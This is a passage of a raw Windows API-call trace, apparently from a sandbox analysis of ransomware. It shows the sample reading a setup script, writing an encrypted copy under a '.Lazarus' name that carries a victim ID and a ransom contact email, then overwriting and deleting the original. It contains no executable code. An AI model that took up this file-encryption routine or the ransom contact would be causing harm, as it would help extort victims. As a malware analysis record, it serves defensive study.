dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0060.216] AreFileApisANSI () returned 1 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.216] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241)) returned 1 [0060.216] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.216] AreFileApisANSI () returned 1 [0060.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.216] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.217] GetLastError () returned 0x0 [0060.217] SetLastError (dwErrCode=0x0) [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0060.217] GetLastError () returned 0x0 [0060.217] SetLastError (dwErrCode=0x0) [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0060.217] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.217] AreFileApisANSI () returned 1 [0060.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0060.217] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xda) returned 0x31cd0 [0060.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x31cd0, cchWideChar=109 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 109 [0060.217] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.219] GetFileType (hFile=0x41c) returned 0x1 [0060.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.219] AreFileApisANSI () returned 1 [0060.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0060.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.219] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.219] GetFileType (hFile=0x424) returned 0x1 [0060.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0060.219] GetLastError () returned 0x0 [0060.219] SetLastError (dwErrCode=0x0) [0060.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.220] GetLastError () returned 0x0 [0060.220] SetLastError (dwErrCode=0x0) [0060.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.220] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x241, lpOverlapped=0x0) returned 1 [0060.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.415] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0060.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0060.415] GetLastError () returned 0x0 [0060.415] SetLastError (dwErrCode=0x0) [0060.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1) returned 0x7cee0 [0060.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0060.415] GetLastError () returned 0x0 [0060.415] SetLastError (dwErrCode=0x0) [0060.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0060.416] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327ef70*=0x250, lpOverlapped=0x0) returned 1 [0060.417] GetLastError () returned 0x0 [0060.417] SetLastError (dwErrCode=0x0) [0060.417] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.417] GetLastError () returned 0x0 [0060.417] SetLastError (dwErrCode=0x0) [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0060.418] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0060.418] CloseHandle (hObject=0x41c) returned 1 [0060.419] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.419] CloseHandle (hObject=0x424) returned 1 [0060.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.419] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0060.420] AreFileApisANSI () returned 1 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.420] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0060.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.420] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.536] GetFileType (hFile=0x410) returned 0x1 [0060.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0060.536] GetLastError () returned 0xb7 [0060.536] SetLastError (dwErrCode=0xb7) [0060.536] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0060.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.537] CloseHandle (hObject=0x410) returned 1 [0060.537] AreFileApisANSI () returned 1 [0060.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0060.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a98 [0060.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0060.537] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.539] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x23, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0060.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0060.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.540] AreFileApisANSI () returned 1 [0060.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 34 [0060.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.540] AreFileApisANSI () returned 1 [0060.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69300 [0060.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.540] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.540] GetFileType (hFile=0x410) returned 0x1 [0060.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0060.541] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.541] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.541] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.541] CloseHandle (hObject=0x410) returned 1 [0060.542] AreFileApisANSI () returned 1 [0060.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x694e0 [0060.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.542] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.542] GetFileType (hFile=0x410) returned 0x1 [0060.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0060.542] CloseHandle (hObject=0x410) returned 1 [0060.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.543] AreFileApisANSI () returned 1 [0060.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0060.543] MultiByteToWideChar (in: CodePage=0x0, 